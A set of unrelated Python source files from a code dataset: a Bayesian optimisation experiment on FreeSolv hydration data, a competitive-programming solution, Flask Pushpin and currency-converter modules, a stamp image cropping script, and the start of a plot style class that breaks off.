function\n het_X_next = min(xs_train, key=lambda x: np.linalg.norm(x - het_X_next))\n het_index = list(xs_train[:, 0]).index(het_X_next[0])\n het_Y_next = ys_train[het_index]\n het_composite_obj_val = het_Y_next + penalty*std_train[het_index]\n het_noise_val = std_train[het_index]\n het_collected_x.append(het_X_next)\n\n if het_composite_obj_val < het_best_so_far:\n het_best_so_far = het_composite_obj_val\n het_obj_val_list.append(het_composite_obj_val)\n else:\n het_obj_val_list.append(het_best_so_far)\n\n if het_noise_val < het_noise_best_so_far:\n het_noise_best_so_far = het_noise_val\n 
het_noise_val_list.append(het_noise_val)\n else:\n het_noise_val_list.append(het_noise_best_so_far)\n\n # Add sample to previous samples\n het_X_sample = np.vstack((het_X_sample, het_X_next))\n het_Y_sample = np.vstack((het_Y_sample, het_Y_next))\n\n # Obtain next sampling point from the augmented expected improvement (AEI)\n\n aug_X_next = my_propose_location(augmented_expected_improvement, aug_X_sample, aug_Y_sample, noise, l_init, sigma_f_init,\n bounds, plot_sample, n_restarts=3, min_val=300, aleatoric_weight=aleatoric_weight, aei=True)\n\n aug_collected_x.append(aug_X_next)\n\n # Obtain next noisy sample from the objective function\n aug_X_next = min(xs_train, key=lambda x: np.linalg.norm(x - aug_X_next))\n aug_index = list(xs_train[:, 0]).index(aug_X_next[0])\n aug_Y_next = ys_train[aug_index]\n aug_composite_obj_val = aug_Y_next + penalty*std_train[aug_index]\n aug_noise_val = std_train[aug_index]\n aug_collected_x.append(aug_X_next)\n\n if aug_composite_obj_val < aug_best_so_far:\n aug_best_so_far = aug_composite_obj_val\n aug_obj_val_list.append(aug_composite_obj_val)\n else:\n aug_obj_val_list.append(aug_best_so_far)\n\n if aug_noise_val < aug_noise_best_so_far:\n aug_noise_best_so_far = aug_noise_val\n aug_noise_val_list.append(aug_noise_val)\n else:\n aug_noise_val_list.append(aug_noise_best_so_far)\n\n # Add sample to previous sample\n aug_X_sample = np.vstack((aug_X_sample, aug_X_next))\n aug_Y_sample = np.vstack((aug_Y_sample, aug_Y_next))\n\n # Obtain next sampling point from the heteroscedastic augmented expected improvement (het-AEI)\n\n aug_het_X_next = heteroscedastic_propose_location(heteroscedastic_augmented_expected_improvement, aug_het_X_sample,\n aug_het_Y_sample, noise, l_init, sigma_f_init, l_noise_init,\n sigma_f_noise_init, gp2_noise, num_iters, sample_size, bounds,\n plot_sample, n_restarts=3, min_val=300, aleatoric_weight=aleatoric_weight)\n\n aug_het_collected_x.append(aug_het_X_next)\n\n # Obtain next noisy sample from the objective function\n aug_het_X_next = min(xs_train, key=lambda x: np.linalg.norm(x - aug_het_X_next))\n aug_het_index = list(xs_train[:, 0]).index(aug_het_X_next[0])\n aug_het_Y_next = ys_train[aug_het_index]\n aug_het_composite_obj_val = aug_het_Y_next + penalty*std_train[aug_het_index]\n aug_het_noise_val = std_train[aug_het_index]\n aug_het_collected_x.append(aug_het_X_next)\n\n if aug_het_composite_obj_val < aug_het_best_so_far:\n aug_het_best_so_far = aug_het_composite_obj_val\n aug_het_obj_val_list.append(aug_het_composite_obj_val)\n else:\n aug_het_obj_val_list.append(aug_het_best_so_far)\n\n if aug_het_noise_val < aug_het_noise_best_so_far:\n aug_het_noise_best_so_far = aug_het_noise_val\n aug_het_noise_val_list.append(aug_het_noise_val)\n else:\n aug_het_noise_val_list.append(aug_het_noise_best_so_far)\n\n # Add sample to previous sample\n aug_het_X_sample = np.vstack((aug_het_X_sample, aug_het_X_next))\n aug_het_Y_sample = np.vstack((aug_het_Y_sample, aug_het_Y_next))\n\n rand_running_sum += np.array(rand_obj_val_list, dtype=np.float64).flatten()\n rand_squares += np.array(rand_obj_val_list, dtype=np.float64).flatten() ** 2\n homo_running_sum += np.array(homo_obj_val_list, dtype=np.float64).flatten()\n homo_squares += np.array(homo_obj_val_list, dtype=np.float64).flatten() ** 2\n hetero_running_sum += np.array(het_obj_val_list, dtype=np.float64).flatten()\n hetero_squares += np.array(het_obj_val_list, dtype=np.float64).flatten() ** 2\n aug_running_sum += np.array(aug_obj_val_list, dtype=np.float64).flatten()\n aug_squares += 
np.array(aug_obj_val_list, dtype=np.float64).flatten() ** 2\n aug_het_running_sum += np.array(aug_het_obj_val_list, dtype=np.float64).flatten()\n aug_het_squares += np.array(aug_het_obj_val_list, dtype=np.float64).flatten() ** 2\n\n rand_noise_running_sum += np.array(rand_noise_val_list, dtype=np.float64).flatten() # just the way to average out across all random trials\n rand_noise_squares += np.array(rand_noise_val_list, dtype=np.float64).flatten() ** 2 # likewise for errors\n homo_noise_running_sum += np.array(homo_noise_val_list, dtype=np.float64).flatten()\n homo_noise_squares += np.array(homo_noise_val_list, dtype=np.float64).flatten() ** 2\n hetero_noise_running_sum += np.array(het_noise_val_list, dtype=np.float64).flatten()\n hetero_noise_squares += np.array(het_noise_val_list, dtype=np.float64).flatten() ** 2\n aug_noise_running_sum += np.array(aug_noise_val_list, dtype=np.float64).flatten()\n aug_noise_squares += np.array(aug_noise_val_list, dtype=np.float64).flatten() ** 2\n aug_het_noise_running_sum += np.array(aug_het_noise_val_list, dtype=np.float64).flatten()\n aug_het_noise_squares += np.array(aug_het_noise_val_list, dtype=np.float64).flatten() ** 2\n\n print(f'trial {i} complete')\n\n if init_set_size == 0.2:\n\n seed_index = i + start_seed + 1\n\n np.savetxt(f'freesolv_data/02_pen_1/rand_means/rand_means_{start_seed}_{seed_index}.txt', rand_running_sum)\n np.savetxt(f'freesolv_data/02_pen_1/rand_means/rand_squares_{start_seed}_{seed_index}.txt', rand_squares)\n np.savetxt(f'freesolv_data/02_pen_1/homo_means/homo_means_{start_seed}_{seed_index}.txt', homo_running_sum)\n np.savetxt(f'freesolv_data/02_pen_1/homo_means/homo_squares_{start_seed}_{seed_index}.txt', homo_squares)\n np.savetxt(f'freesolv_data/02_pen_1/het_means/hetero_means_{start_seed}_{seed_index}.txt', hetero_running_sum)\n np.savetxt(f'freesolv_data/02_pen_1/het_means/hetero_squares_{start_seed}_{seed_index}.txt', hetero_squares)\n np.savetxt(f'freesolv_data/02_pen_1/aug_means/aug_means_{start_seed}_{seed_index}.txt', aug_running_sum)\n np.savetxt(f'freesolv_data/02_pen_1/aug_means/aug_squares_{start_seed}_{seed_index}.txt', aug_squares)\n np.savetxt(f'freesolv_data/02_pen_1/aug_het_means/aug_het_means_{start_seed}_{seed_index}.txt', aug_het_running_sum)\n np.savetxt(f'freesolv_data/02_pen_1/aug_het_means/aug_het_squares_{start_seed}_{seed_index}.txt', aug_het_squares)\n\n np.savetxt(f'freesolv_data/02_pen_1/rand_noise/rand_means_{start_seed}_{seed_index}.txt', rand_noise_running_sum)\n np.savetxt(f'freesolv_data/02_pen_1/rand_noise/rand_squares_{start_seed}_{seed_index}.txt', rand_noise_squares)\n np.savetxt(f'freesolv_data/02_pen_1/homo_noise/homo_means_{start_seed}_{seed_index}.txt', homo_noise_running_sum)\n np.savetxt(f'freesolv_data/02_pen_1/homo_noise/homo_squares_{start_seed}_{seed_index}.txt', homo_noise_squares)\n np.savetxt(f'freesolv_data/02_pen_1/het_noise/hetero_means_{start_seed}_{seed_index}.txt', hetero_noise_running_sum)\n np.savetxt(f'freesolv_data/02_pen_1/het_noise/hetero_squares_{start_seed}_{seed_index}.txt', hetero_noise_squares)\n np.savetxt(f'freesolv_data/02_pen_1/aug_noise/aug_means_{start_seed}_{seed_index}.txt', aug_noise_running_sum)\n np.savetxt(f'freesolv_data/02_pen_1/aug_noise/aug_squares_{start_seed}_{seed_index}.txt', aug_noise_squares)\n np.savetxt(f'freesolv_data/02_pen_1/aug_het_noise/aug_het_means_{start_seed}_{seed_index}.txt', aug_het_noise_running_sum)\n np.savetxt(f'freesolv_data/02_pen_1/aug_het_noise/aug_het_squares_{start_seed}_{seed_index}.txt', 
aug_het_noise_squares)\n\n rand_means = rand_running_sum / random_trials\n rand_errs = (np.sqrt(rand_squares / random_trials - rand_means **2))/np.sqrt(random_trials)\n homo_means = homo_running_sum / random_trials\n hetero_means = hetero_running_sum / random_trials\n homo_errs = (np.sqrt(homo_squares / random_trials - homo_means ** 2, dtype=np.float64))/np.sqrt(random_trials)\n hetero_errs = (np.sqrt(hetero_squares / random_trials - hetero_means ** 2, dtype=np.float64))/np.sqrt(random_trials)\n aug_means = aug_running_sum / random_trials\n aug_errs = (np.sqrt(aug_squares / random_trials - aug_means ** 2, dtype=np.float64))/np.sqrt(random_trials)\n aug_het_means = aug_het_running_sum / random_trials\n aug_het_errs = (np.sqrt(aug_het_squares / random_trials - aug_het_means **2, dtype=np.float64))/np.sqrt(random_trials)\n\n rand_noise_means = rand_noise_running_sum / random_trials\n homo_noise_means = homo_noise_running_sum / random_trials\n hetero_noise_means = hetero_noise_running_sum / random_trials\n rand_noise_errs = (np.sqrt(rand_noise_squares / random_trials - rand_noise_means ** 2))/np.sqrt(random_trials)\n homo_noise_errs = (np.sqrt(homo_noise_squares / random_trials - homo_noise_means ** 2))/np.sqrt(random_trials)\n hetero_noise_errs = (np.sqrt(hetero_noise_squares / random_trials - hetero_noise_means ** 2))/np.sqrt(random_trials)\n aug_noise_means = aug_noise_running_sum / random_trials\n aug_noise_errs = (np.sqrt(aug_noise_squares / random_trials - aug_noise_means ** 2))/np.sqrt(random_trials)\n aug_het_noise_means = aug_het_noise_running_sum / random_trials\n aug_het_noise_errs = (np.sqrt(aug_het_noise_squares / random_trials - aug_het_noise_means ** 2))/np.sqrt(random_trials)\n\n print('List of average random values is: ' + str(rand_means))\n print('List of random errors is: ' + str(rand_noise_means))\n print('List of average homoscedastic values is: ' + str(homo_means))\n print('List of homoscedastic errors is: ' + str(homo_noise_means))\n print('List of average heteroscedastic values is ' + str(hetero_means))\n print('List of heteroscedastic errors is: ' + str(hetero_noise_means))\n print('List of average AEI values is: ' + str(aug_means))\n print('List of AEI errors is: ' + str(aug_noise_means))\n print('List of average het-AEI values is: ' + str(aug_het_means))\n print('List of het-AEI errors is: ' + str(aug_het_noise_means))\n\n iter_x = np.arange(1, bayes_opt_iters + 1)\n\n # clear figure from previous fplot returns if fiddling with form of function\n plt.cla()\n\n ax = plt.gca()\n ax.xaxis.set_major_locator(MaxNLocator(integer=True))\n lower_rand = np.array(rand_means) - np.array(rand_errs)\n upper_rand = np.array(rand_means) + np.array(rand_errs)\n lower_homo = np.array(homo_means) - np.array(homo_errs)\n upper_homo = np.array(homo_means) + np.array(homo_errs)\n lower_hetero = np.array(hetero_means) - np.array(hetero_errs)\n upper_hetero = np.array(hetero_means) + np.array(hetero_errs)\n lower_aei = np.array(aug_means) - np.array(aug_errs)\n upper_aei = np.array(aug_means) + np.array(aug_errs)\n lower_het_aei = np.array(aug_het_means) - np.array(aug_het_errs)\n upper_het_aei = np.array(aug_het_means) + np.array(aug_het_errs)\n\n plt.plot(iter_x, rand_means, color='tab:orange', label='RS')\n plt.plot(iter_x, homo_means, color='tab:blue', label='EI')\n plt.plot(iter_x, hetero_means, color='tab:green', label='ANPEI')\n plt.plot(iter_x, aug_means, color='tab:red', label='AEI')\n plt.plot(iter_x, aug_het_means, color='tab:purple', label='HAEI')\n plt.fill_between(iter_x, 
lower_rand, upper_rand, color='tab:orange', alpha=0.1)\n plt.fill_between(iter_x, lower_homo, upper_homo, color='tab:blue', alpha=0.1)\n plt.fill_between(iter_x, lower_hetero, upper_hetero, color='tab:green', alpha=0.1)\n plt.fill_between(iter_x, lower_aei, upper_aei, color='tab:red', alpha=0.1)\n plt.fill_between(iter_x, lower_het_aei, upper_het_aei, color='tab:purple', alpha=0.1)\n\n #plt.title('Best Objective Function Value Found so Far', fontsize=16)\n plt.xlabel('Function Evaluations', fontsize=14)\n if penalty != 1:\n plt.ylabel(f'Hydration Free Energy (kcal/mol) + {penalty}*Noise', fontsize=14)\n else:\n plt.ylabel(f'Hydration Free Energy (kcal/mol) + Noise', fontsize=14)\n plt.tick_params(labelsize=14)\n #plt.legend(loc=1)\n plt.legend(loc='lower left', bbox_to_anchor=(0.0, -0.425), ncol=3, borderaxespad=0, fontsize=14, frameon=False)\n plt.savefig('new_freesolv_figures/bayesopt_plot{}_iters_{}_random_trials_and_init_num_samples_of_{}_and_seed_{}_'\n 'new_acq_penalty_is_{}_aleatoric_weight_is_{}_n_components_is_{}_new_aei_comp_seed_check'.\n format(bayes_opt_iters, random_trials, init_num_samples, numpy_seed, penalty, aleatoric_weight, n_components), bbox_inches='tight')\n\n plt.close()\n\n # clear figure from previous fplot returns if fiddling with form of function\n plt.cla()\n\n ax = plt.gca()\n ax.xaxis.set_major_locator(MaxNLocator(integer=True))\n lower_noise_rand = np.array(rand_noise_means) - np.array(rand_noise_errs)\n upper_noise_rand = np.array(rand_noise_means) + np.array(rand_noise_errs)\n lower_noise_homo = np.array(homo_noise_means) - np.array(homo_noise_errs)\n upper_noise_homo = np.array(homo_noise_means) + np.array(homo_noise_errs)\n lower_noise_hetero = np.array(hetero_noise_means) - np.array(hetero_noise_errs)\n upper_noise_hetero = np.array(hetero_noise_means) + np.array(hetero_noise_errs)\n lower_noise_aei = np.array(aug_noise_means) - np.array(aug_noise_errs)\n upper_noise_aei = np.array(aug_noise_means) + np.array(aug_noise_errs)\n lower_noise_het_aei = np.array(aug_het_noise_means) - np.array(aug_het_noise_errs)\n upper_noise_het_aei = np.array(aug_het_noise_means) + np.array(aug_het_noise_errs)\n\n plt.plot(iter_x, rand_noise_means, color='tab:orange', label='RS')\n plt.plot(iter_x, homo_noise_means, color='tab:blue', label='EI')\n plt.plot(iter_x, hetero_noise_means, color='tab:green', label='ANPEI')\n plt.plot(iter_x, aug_noise_means, color='tab:red', label='AEI')\n plt.plot(iter_x, aug_het_noise_means, color='tab:purple', label='HAEI')\n plt.fill_between(iter_x, lower_noise_rand, upper_noise_rand, color='tab:orange', alpha=0.1)\n plt.fill_between(iter_x, lower_noise_homo, upper_noise_homo, color='tab:blue', alpha=0.1)\n plt.fill_between(iter_x, lower_noise_hetero, upper_noise_hetero, color='tab:green', alpha=0.1)\n plt.fill_between(iter_x, lower_noise_aei, upper_noise_aei, color='tab:red', alpha=0.1)\n plt.fill_between(iter_x, lower_noise_het_aei, upper_noise_het_aei, color='tab:purple', alpha=0.1)\n\n #plt.title('Lowest Aleatoric Noise Found so Far', fontsize=16)\n plt.xlabel('Function Evaluations', fontsize=14)\n plt.ylabel('Aleatoric Noise', fontsize=14)\n plt.tick_params(labelsize=14)\n #plt.legend(loc=1)\n plt.legend(loc='lower left', bbox_to_anchor=(0.0, -0.425), ncol=3, borderaxespad=0, fontsize=14, frameon=False)\n plt.savefig('new_freesolv_figures/bayesopt_plot{}_iters_{}_random_trials_and_init_num_samples_of_{}_and_seed_{}_'\n 'noise_only_new_acq_penalty_is_{}_aleatoric_weight_is_{}_n_components_is_{}_new_aei_comp_seed_check'.\n 
format(bayes_opt_iters, random_trials, init_num_samples, numpy_seed, penalty, aleatoric_weight, n_components), bbox_inches='tight')\n\n\nif __name__ == '__main__':\n\n parser = argparse.ArgumentParser()\n\n parser.add_argument('-p', '--penalty', type=int, default=1,\n help='$\\alpha$ parameter specifying weight of noise component to objective.')\n parser.add_argument('-a', '--aleatoric_weight', type=float, default=1,\n help='The value of both $\\beta and $\\gamma of ANPEI and HAEI')\n parser.add_argument('-r', '--random_trials', type=int, default=50,\n help='Number of random initialisations')\n parser.add_argument('-b', '--bayes_opt_iters', type=int, default=10,\n help='The number of iterations of BayesOpt')\n parser.add_argument('-t', '--init_set_size', type=float, default=0.2,\n help='The fraction of datapoints to initialise with')\n parser.add_argument('-pc', '--n_components', type=int, default=14,\n help='The number of principle components to keep')\n parser.add_argument('-path', '--path', type=str, default='../bayesopt_datasets/Freesolv/Freesolv.txt',\n help='The path to the Freesolv.txt file')\n\n args = parser.parse_args()\n\n main(args.penalty, args.aleatoric_weight, args.random_trials, args.bayes_opt_iters, args.init_set_size,\n args.n_components, args.path)\n","sub_path":"BayesOpt/bayesopt_experiments/freesolv.py","file_name":"freesolv.py","file_ext":"py","file_size_in_byte":27535,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"605411753","text":"from collections import Counter\nN =int(input())\nA = Counter(list(map(int,input().split())))\nB = Counter(list(map(int,input().split())))\nC = Counter(list(map(int,input().split())))\nA_sort = sorted(A.items())\nB_sort = sorted(B.items())\nC_sort = sorted(C.items())\n\nBtoC = []\nans = 0\nstart_j = 0\nstart_k = 0\nsum_val = N\nfor j in range(len(B_sort)):\n for k in range(start_k , len(C_sort)):\n if B_sort[j][0] >= C_sort[k][0]:\n sum_val -= C_sort[k][1]\n start_k = k + 1\n else:\n BtoC.append([B_sort[j][0] , sum_val * B_sort[j][1]])\n break\n#print(BtoC)\nwork = 0\nfor i in range(len(BtoC) - 2 , -1 , -1):\n BtoC[i][1] = BtoC[i+1][1] + BtoC[i][1]\n work = BtoC[i+1][1]\n#print(BtoC)\nfor i in range(len(A_sort)):\n for j in range(start_j , len(BtoC)):\n if A_sort[i][0] >= BtoC[j][0]:\n start_j = j + 1\n else:\n ans += A_sort[i][1] * BtoC[j][1]\n break\nprint(ans)","sub_path":"ABC/77/3.py","file_name":"3.py","file_ext":"py","file_size_in_byte":957,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"507418557","text":"# -*- coding: utf-8 -*-\n\nfrom gripcontrol import GripPubControl\nfrom gripcontrol import WebSocketMessageFormat\nfrom pubcontrol import Item\n\nfrom restapi.utilities.logs import log\nfrom restapi.flask_ext import BaseExtension\n\n\nclass ServiceUnavailable(BaseException):\n pass\n\n\nclass PushpinExt(BaseExtension):\n\n def set_connection_exception(self):\n return ServiceUnavailable\n\n def custom_connection(self, **kwargs):\n\n if len(kwargs) > 0:\n variables = kwargs\n else:\n variables = self.variables\n\n host = variables.get('host')\n port = variables.get('port')\n\n control_uri = 'http://{}:{}'.format(host, port)\n pubctrl = GripPubControl({\n 'control_uri': control_uri\n })\n\n client = PushpinClient(pubctrl)\n\n is_active = client.publish_on_stream('admin', 'Connection test', sync=True)\n\n if is_active:\n return client\n\n raise ServiceUnavailable(\"Pushpin unavailable on 
{}\".format(control_uri))\n\n\nclass PushpinClient:\n\n def __init__(self, pub):\n self.pub = pub\n\n def callback(self, result, message):\n if result:\n log.debug('Message successfully published on pushpin')\n else:\n log.error('Publish failed on pushpin: {}', message)\n\n def publish_on_stream(self, channel, message, sync=False):\n if not sync:\n self.pub.publish_http_stream(\n channel, message, callback=self.callback)\n return True\n\n try:\n self.pub.publish_http_stream(channel, message, blocking=True)\n log.debug('Message successfully published on pushpin')\n return True\n except BaseException as e:\n log.error('Publish failed on pushpin: {}', message)\n log.error(e)\n return False\n\n def publish_on_socket(self, channel, message, sync=False):\n item = Item(WebSocketMessageFormat(message, binary=False))\n if not sync:\n self.pub.publish(channel, item, callback=self.callback)\n return True\n\n try:\n self.pub.publish(channel, item, blocking=True)\n log.debug('Message successfully published on pushpin')\n return True\n except BaseException as e:\n log.error('Publish failed on pushpin: {}', message)\n log.error(e)\n return False\n","sub_path":"restapi/flask_ext/flask_pushpin.py","file_name":"flask_pushpin.py","file_ext":"py","file_size_in_byte":2393,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"484892791","text":"\r\nimport os\r\nimport cv2\r\nimport numpy as np\r\nfrom matplotlib import pyplot as plt\r\nimport PIL\r\nfrom PIL import Image\r\nimport glob2\r\n\r\nnames = []\r\n# for file in os.listdir('C:\Users\dcc\Desktop\stamps\preprocess\Part_Crop\Cropout_stamp'):\r\n # if file.endswith('.jpg'):\r\n # names.append(file)\r\n\r\n\r\nimages = []\r\n\r\npath_to_images = '/shared/kgcoe-research/mil/stamp_stamp/data/cropout_stamp/181'\r\nall_imgs = glob2.glob(path_to_images+'/**/*.jpg')\r\n# for img in all_imgs:\r\n # n= cv2.imread(img)\r\n # images.append(n)\r\n # names.append(img.split('/')[-1].split('.')[0])\r\n\r\n\r\n\r\nfor i in range(20):\r\n # print i\r\n img = cv2.imread(all_imgs[i])\r\n name = all_imgs[i].split('/')[-1].split('.')[0]\r\n #Convert BGR image to RGB\r\n # img= images[i]\r\n b,g,r = cv2.split(img)\r\n img2 = cv2.merge([r,g,b])\r\n\r\n # # Crop Corners----->PLATE Row and Column of the Stamp\r\n # m = 0.16*img2.shape[1] #Left part\r\n # n=0.84*img2.shape[1] #Right part\r\n # p=0.13*img2.shape[0] #Top part\r\n # q=0.87*img2.shape[0] #Bottom part\r\n\r\n # Crop Corners----->PLATE Row and Column of the Stamp (int so they can be used as slice indices)\r\n m = int(0.16*img2.shape[1]) #Left part\r\n n=int(0.84*img2.shape[1]) #Right part\r\n p=int(0.26*img2.shape[0]) #Top part\r\n q=int(0.74*img2.shape[0]) #Bottom part\r\n\r\n img_crop1 = img2[0:p,0:m ,:]\r\n img_crop2 = img2[0:p,n:,:]\r\n img_crop3 = img2[q:, 0:m,:]\r\n img_crop4 = img2[q:, n:, :]\r\n\r\n #Resize Corners\r\n dim = (112, 224)\r\n img_crop1 = cv2.resize(img_crop1, dim, interpolation=cv2.INTER_AREA)\r\n img_crop2 = cv2.resize(img_crop2, dim, interpolation=cv2.INTER_AREA)\r\n img_crop3 = cv2.resize(img_crop3, dim, interpolation=cv2.INTER_AREA)\r\n img_crop4 = cv2.resize(img_crop4, dim, interpolation=cv2.INTER_AREA)\r\n\r\n #Combine to get a block of 4 Corners [1,2];[3,4]\r\n column1 = np.concatenate((img_crop1,img_crop3),axis=0)\r\n column2 = np.concatenate((img_crop2, img_crop4), axis=0)\r\n block = np.concatenate((column1,column2),axis=1)\r\n\r\n #Combine to get Same element block\r\n Row = np.concatenate((img_crop1,img_crop4),axis=1)\r\n Column= np.concatenate((img_crop3, img_crop2), axis=1)\r\n\r\n # Crop 
Side-Middle portion----->PLATE number of the Stamp\r\n width_plate_left = int(0.24*img2.shape[1]) \r\n width_plate_right = int(0.86*img2.shape[1]) \r\n x= int(0.35*img2.shape[0]) #Middle Top\r\n y= int(0.65*img2.shape[0]) #Middle Bottom\r\n\r\n img_crop5 = img2[x:y,0:width_plate_left,:]\r\n img_crop6 = img2[x:y,width_plate_right:,:]\r\n\r\n #Resize\r\n dim = (135, 224)\r\n img_crop5= cv2.resize(img_crop5,dim,interpolation=cv2.INTER_AREA)\r\n dim = (89, 224)\r\n \r\n img_crop6 = cv2.resize(img_crop6, dim, interpolation=cv2.INTER_AREA)\r\n\r\n #Combine to get Final output--->PLATE number\r\n visual = np.concatenate((img_crop5,img_crop6),axis=1)\r\n\r\n cv2.imwrite('crop_row_'+name+'.jpg',cv2.cvtColor(Row, cv2.COLOR_BGR2RGB))\r\n cv2.imwrite('crop_column_'+name+'.jpg',cv2.cvtColor(Column, cv2.COLOR_BGR2RGB)) \r\n cv2.imwrite('crop_plate_'+name+'.jpg',cv2.cvtColor(visual, cv2.COLOR_BGR2RGB))\r\n \r\ncv2.waitKey(0)\r\n","sub_path":"pre_processing/part_crop.py","file_name":"part_crop.py","file_ext":"py","file_size_in_byte":3122,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"96717092","text":"from sklearn.datasets import load_svmlight_file\nimport numpy as np\nimport sys\n\ndef checkacc(Yts,Yts_correct):\n\twrong=0\n\tfor i in range(Yts_correct.shape[0]):\n\t\tif(Yts[i]!=Yts_correct[i]):\n\t\t\twrong=wrong+1\n\tacc=(Yts_correct.shape[0]-wrong)/Yts_correct.shape[0]\n\treturn acc\n\ndef predict(Xtr, Ytr, Xts, k, metric=None):\n\n N, D = Xtr.shape\n\n assert N == Ytr.shape[0], \"Number of samples don't match\"\n assert D == Xts.shape[1], \"Train and test dimensions don't match\"\n\n if metric is None:\n metric = np.identity(D)\n\n Yts = np.zeros((Xts.shape[0], 1))\n\n for i in range(Xts.shape[0]):\n a=Xtr-Xts[i]\n LMNN_dist=[]\n mult=np.dot(a,metric)\n for x in range(Xtr.shape[0]):\n LMNN_dist.append(np.dot(a[x],mult[x]))\n LMNN_dist=np.array(LMNN_dist)\n indx=np.argpartition(LMNN_dist,k)[:k]\n (_, idx, counts) = np.unique(Ytr[indx], return_index=True, return_counts=True)\n index = idx[np.argmax(counts)]\n Yts[i]=Ytr[indx][index]\n print(i,Yts[i],k)\n\n return Yts\n\ndef main(): \n\n # Get training and testing file names from the command line\n traindatafile = sys.argv[1]\n testdatafile = sys.argv[2]\n\n # The training file is in libSVM format\n tr_data = load_svmlight_file(traindatafile)\n\n Xtr = tr_data[0].toarray();\n Ytr = tr_data[1];\n\n # The testing file is in libSVM format too\n ts_data = load_svmlight_file(testdatafile)\n\n Xts = ts_data[0].toarray();\n Yts_correct=ts_data[1];\n # The test labels are useless for prediction. 
They are only used for evaluation\n\n # Load the learned metric\n metric = np.load(\"model.npy\")\n\n ### Do something (if required) ###\n \n k=13\n \n Yts = predict(Xtr, Ytr, Xts, k, metric)\n acc = checkacc(Yts, Yts_correct)\n\n # np.savetxt needs a 1D input, so wrap the scalar accuracy in a list\n np.savetxt(\"Accuracy.dat\", [acc])\n\n # Save predictions to a file\n\t# Warning: do not change this file name\n # np.savetxt(\"testY.dat\", Yts)\n\nif __name__ == '__main__':\n main()\n","sub_path":"CS771/Assignments/assn1/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1975,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"579803966","text":"#!/usr/bin/env python3\nimport json\nimport logging\n\nfrom flask import Flask, request, make_response, jsonify\nfrom currency_converter import CurrencyConverter, CurrencyError\n\napp = Flask(__name__)\n\n\n@app.route('/currency_converter', methods=['GET'])\ndef currency_converter():\n \"\"\"Handle requests for converting currencies.\"\"\"\n amount = request.args.get(\"amount\")\n input_currency = request.args.get(\"input_currency\")\n output_currency = request.args.get(\"output_currency\")\n\n if amount is None or input_currency is None:\n return make_response(jsonify({\n \"error\": \"Missing required value(s)\",\n \"description\": \"amount or input_currency is not specified\"}), 400)\n\n if not amount or not input_currency:\n return make_response(jsonify({\n \"error\": \"Value(s) not specified\",\n \"description\": \"amount or input_currency has no value\"}), 400)\n\n try:\n converter.load_rates()\n result = converter.convert(input_currency,\n output_currency,\n float(amount))\n except CurrencyError:\n # json.dumps converts utf8 codes into symbols, jsonify couldn't\n return make_response(json.dumps({\n \"error\": \"Invalid currency\",\n \"supportedCurrencies\": converter.codes}, ensure_ascii=False), 400)\n except Exception as e:\n logging.exception(e)\n return make_response(jsonify({\"error\": \"Server error\"}), 500)\n\n return make_response(jsonify(result), 200)\n\n\n@app.errorhandler(404)\ndef error_handler(e):\n return make_response(jsonify({\"error\": \"Not found\"}), 404)\n\n\nif __name__ == '__main__':\n converter = CurrencyConverter()\n app.run()\n","sub_path":"api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":1719,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"529423651","text":"\n\nfrom xai.brain.wordbase.nouns._slipper import _SLIPPER\n\n#class header\nclass _SLIPPERS(_SLIPPER, ):\n\tdef __init__(self,): \n\t\t_SLIPPER.__init__(self)\n\t\tself.name = \"SLIPPERS\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"slipper\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_slippers.py","file_name":"_slippers.py","file_ext":"py","file_size_in_byte":245,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"163346931","text":"#!/usr/bin/env python\n\n'''\nCreated by Samvel Khalatyan, Feb 23, 2012\nCopyright 2011, All rights reserved\n'''\n\nimport random\n\nclass Style(object):\n '''\n Minimalistic style for plots\n '''\n\n def __init__(self,\n color = 1, # black by default\n marker_size = 0.5,\n marker_style = 1,\n line_width = 2,\n line_style = None,\n fill_style = 1001):\n\n self.__color = color\n self.__marker_size = marker_size\n self.__marker_style = marker_style\n self.__line_width = line_width\n self.__line_style = line_style\n self.__fill_style = fill_style\n\n @property\n def color(self):\n '''\n 
Histogram color. It should be applied to:\n - marker\n - line\n - fill (if fill flag is set)\n '''\n\n return self.__color\n\n @property\n def marker_size(self):\n '''\n Marker size\n '''\n\n return self.__marker_size\n\n @property\n def marker_style(self):\n '''\n Marker style\n '''\n\n return self.__marker_style\n\n @property\n def line_width(self):\n '''\n Width of the bar lines\n '''\n\n return self.__line_width\n\n @property\n def line_style(self):\n '''\n Style of the bar lines\n '''\n\n return self.__line_style\n\n @property\n def fill_style(self):\n '''\n Indicate whether histogram should be filled with specified color\n '''\n\n return self.__fill_style\n\n def apply(self, plot):\n plot.SetLineColor(self.color)\n plot.SetFillColor(self.color)\n\n plot.SetFillStyle(self.fill_style)\n plot.SetMarkerStyle(self.marker_style)\n\n plot.SetMarkerSize(self.marker_size)\n plot.SetLineWidth(self.line_width)\n\n if self.line_style:\n plot.SetLineStyle(self.line_style)\n\n def __str__(self):\n return (\"<{Class} color {color} marker size {marker_size} \"\n \"line width {line_width} fill {fill} at 0x{ID:x}>\").format(\n Class = self.__class__.__name__,\n ID = id(self),\n color = self.color,\n marker_size = self.marker_size,\n line_width = self.line_width,\n fill = self.__fill_style)\n\nclass BaseStyle(object):\n '''\n Base for all histogram styles. It can be set to certain values that are\n allowed by __contains__ method. Child classes should overload above\n method, e.g.:\n\n class HumanStyle(BaseStyle):\n human_styles = set([\"male\", \"female\"])\n\n def __init__(self, style):\n BaseStyle.__init__(self, style)\n\n def __contains__(self, style):\n # Test if style is allowed\n return (style in self.human_styles or\n BaseStyle.__contains__(self, style))\n\n By default, BaseStyle does not allow any style to be set. The value of\n current style can be fixed if instance was created with fixed parameter\n set to True. 
